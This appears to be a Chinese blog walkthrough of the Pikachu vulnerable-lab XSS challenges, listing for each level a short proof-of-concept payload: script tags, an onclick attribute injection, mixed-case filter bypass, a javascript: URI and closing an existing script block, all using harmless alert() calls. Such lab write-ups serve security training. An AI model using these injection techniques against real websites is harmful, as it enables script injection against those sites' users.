pikachu-XSS闯关挑战

get

复制代码
message=<script>alert("123")</script>&submit=submit

post

可以暴力破解账号密码,但由于是XSS练习,点右上角的提示,就可以登陆

直接在输入框中输入

复制代码
<script>alert("123")</script>

存储型

复制代码
<script>alert("123")</script>

DOM

随意输入可以看到提示

进入源码找到提示,将标签闭合

复制代码
' onclick="alert('123')"

xss-x

同样的语句,链接点两次

盲打

在留言板输入,发现没有变化,在提示中看到登陆后台

复制代码
<script>alert("456")</script>

在后台可以看到弹窗

过滤

输入发现被过滤

大小写混合,成功

复制代码
<SCriPt>alert("123")</sCrIPt>

html

可以看到源码时链接

输入

复制代码
javascript:alert(/xss/)

href

输入上一个,点击链接即可

js输出

看到源码是一个script语句,将前面的闭合,再写一个新的弹窗

复制代码
</script><script>alert("123")</script>
相关推荐
sdghterhd7 小时前
WebSocket 快速入门教程(附示例源码)
网络·websocket·网络协议
xy34538 小时前
Wireshark捕获过滤器——语法元素详解
网络·测试工具·渗透测试·wireshark
DLYSB_9 小时前
生命通道:如何用 HIS 医疗系统直连网络声光终端,打造“零延误”的危急值响应网关?
java·网络·数据库·报警灯
xixixi777779 小时前
三大 AI 安全里程碑:Akamai 高危风险预警、智能体水印强制落地、PQC 量子安全全产业链统一
大数据·人工智能·安全·ai·大模型·智能体·政策
德福危险10 小时前
富有想象力的XSS盲打:靶机练习之Tempus_fugit5
服务器·网络·xss
哥是强混11 小时前
Means:基于 .NET 10 打造的开源自部署 S3 兼容对象存储服务
网络·数据库·.net
hz5678911 小时前
电子远程评标系统哪家好?安全、合规、易用平台评测指南
安全·云计算·音视频·实时音视频·信息与通信
MartinYeung512 小时前
[论文学习]大语言模型安全综述:攻击、防御、对齐、度量与护栏的深度解析
学习·安全·语言模型
Piko61412 小时前
锐捷 VSU 虚拟化堆叠配置
运维·网络·笔记
爱研究的小梁14 小时前
乾元通多链路聚合通信主流落地应用案例
网络·信息与通信